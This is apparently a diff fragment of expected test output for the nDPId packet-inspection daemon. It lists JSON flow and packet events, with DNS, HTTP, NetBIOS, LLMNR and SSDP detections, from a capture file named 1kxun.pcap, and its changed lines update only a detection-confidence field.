+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377734,"flow_last_seen":1470104377734,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1470104377734,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1470104377734,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1470104377734,"pkt":"TF4M6gNlABxCjnAxCABFAABCUcIAAIARpSjAqHMICAgICMdQADUALoWI\/SwBAAABAAAAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAE="} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1470104377753,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1470104377753,"pkt":"ABxCjnAxTF4M6gNlCABFAABinjgAAC4RqpIICAgIwKhzCAA1x1AATmX5\/SyBgAABAAIAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAHADAABAAEAAAErAARquSNuwAwAAQABAAABKwAEarkjcA=="} -00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104377753,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.185.35.110"}} +00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104377753,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"},"dns": {"query":"jp.kankan.1kxun.mobi","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.185.35.110"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377754,"flow_last_seen":1470104377754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104377754,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1470104377754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1470104377754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377754,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UcRAAIAG5yfAqHMIarkjbsG9AFA9WFFgAAAAAIACIAA9OgAAAgQE7AEDAwgBAQQC"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1470104377810,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377810,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwb1z6xq8PVhRYYASchBbqgAAAgQFtAEBBAIBAwMH"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104377754,"flow_last_seen":1470104377818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1470104377818,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377698","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104377754,"flow_last_seen":1470104377818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":414,"flow_tot_l4_payload_len":414,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1470104377818,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377698","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1470104377820,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1470104377820,"pkt":"AQBeAAD8ABxCjnAxCABFAAAyUccAAAERU0fAqHMI4AAA\/MkCFOsAHtPcYF4AAAABAAAAAAAABHdwYWQAAAEAAQ=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1470104377839,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104377839,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiQQLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACAGQ="} 00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1470104377839,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104377839,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNAJhAgEGADFjB6UAAAAAwKgFCcCoBQnAqHcBAAAAAHDxofgq\/QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQE\/wAAAAAAAAAAAAAAAAAA"} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377901,"flow_last_seen":1470104377901,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104377901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1470104377901,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104377901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcgAAIARpSbAqHMICAgICM3zADUAKlE0ceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377901,"flow_last_seen":1470104377901,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104377901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377901,"flow_last_seen":1470104377901,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104377901,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1470104377901,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104377901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcgAAIARpSbAqHMICAgICM3zADUAKlE0ceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378005,"flow_last_seen":1470104378005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104378005,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1470104378005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378005,"pkt":"ABAj4ACgYMVHBbyMCABFAAAol0tAAEAGqdjAqAUQwKhzS9F2AbsV1ofmvikqE1ARIAA8\/AAAAAAAAAAA"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1470104378007,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378007,"pkt":"ABxCjnAxABAj4ACgCABFAAAoAABAAEAGQSTAqHNLwKgFEAG70Xa+KSoTFdaH51AQAEZctgAAAAAAAAAA"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1470104378021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104378021,"pkt":"\/\/\/\/\/\/\/\/ABxCjnAxCABFAABOUckAAIAR9HzAqHMIwKj\/\/wCJAIkAOha6seYBEAABAAAAAAAAIEZIRkFFQkVFQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1470104378021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104378021,"pkt":"\/\/\/\/\/\/\/\/ABxCjnAxCABFAABOUckAAIAR9HzAqHMIwKj\/\/wCJAIkAOha6seYBEAABAAAAAAAAIEZIRkFFQkVFQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1470104378045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104378045,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD8KMU6wAgDOCgAAAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1470104378045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378045,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LRgAAAER5c3AqAUv4AAA\/PCjFOsAIMFmoAAAAAABAAAAAAAABlJPX1gxQwAA\/wAB"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1470104378045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104378045,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD5ZsU6wAmcsn2BAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1470104378045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104378045,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxQAAAER6ZvAqANf4AAA\/OWbFOsAJvTF9gQAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1470104378045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104378045,"pkt":"AQBef\/\/6\/PiuMpcsCABFAAChLEEAAAER2QnAqANf7\/\/\/+uhMB2wAjbUvTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378045,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104378045,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1470104378454,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104378454,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD5ZsU6wAmcsn2BAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} 